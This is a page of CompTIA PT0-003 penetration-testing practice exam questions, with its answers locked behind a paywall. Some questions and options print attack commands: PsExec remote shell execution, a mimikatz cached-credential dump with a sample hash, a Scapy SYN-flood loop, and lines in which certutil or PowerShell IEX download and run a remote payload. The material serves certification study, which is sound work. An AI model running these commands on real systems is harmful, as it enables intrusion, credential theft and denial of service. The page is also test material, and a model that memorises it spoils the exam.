ExamGecko
Login
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 18

List of questions

Question 171

Report Export Collapse

During a routine penetration test, the client's security team observes logging alerts that indicate several ID badges were reprinted after working hours without authorization. Which of the following is the penetration tester most likely trying to do?

Become a Premium Member for full access
  Unlock Premium Member

Question 172

Report Export Collapse

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:

nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Become a Premium Member for full access
  Unlock Premium Member

Question 173

Report Export Collapse

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

Become a Premium Member for full access
  Unlock Premium Member

Question 174

Report Export Collapse

A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.

Which of the following tools should the security professional use to best accomplish this task?

Become a Premium Member for full access
  Unlock Premium Member

Question 175

Report Export Collapse

A penetration tester gains access to the target network and observes a running SSH server.

Which of the following techniques should the tester use to obtain the version of SSH running on the target server?

Become a Premium Member for full access
  Unlock Premium Member

Question 176

Report Export Collapse

A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone.

Which of the following techniques would be most effective to troubleshoot this issue?

Become a Premium Member for full access
  Unlock Premium Member

Question 177

Report Export Collapse

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Become a Premium Member for full access
  Unlock Premium Member

Question 178

Report Export Collapse

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not connected to the internet or enterprise network. Which of the following should the tester utilize to conduct the testing?

Become a Premium Member for full access
  Unlock Premium Member

Question 179

Report Export Collapse

While performing a penetration test, a tester executes the following command:

PS c:\tools> c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Become a Premium Member for full access
  Unlock Premium Member

Question 180

Report Export Collapse

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

mimikatz # privilege::debug

mimikatz # lsadump::cache

---Output---

lapsUser

27dh9128361tsg2459210138754ij

---OutputEnd---

Which of the following best describes what the tester plans to do by executing the command?

Become a Premium Member for full access
  Unlock Premium Member
Total 214 questions
Go to page: of 22
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use? https://192.168.0.1/foo.exe A. powershell.exe impo C:\tools\foo.ps1 B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe C. powershell.exe -noni -encode IEX.Downloadstring(' http://172.16.0.1/ ') D. rundll32.exe c:\path\foo.dll,functName</a>
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: ip = IP('192.168.50.2') tcp = TCP(sport=RandShort(), dport=80, flags='S') raw = RAW(b'X'*1024) p = ip/tcp/raw send(p, loop=1, verbose=0) Which of the following attack types is most likely being used in the test?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?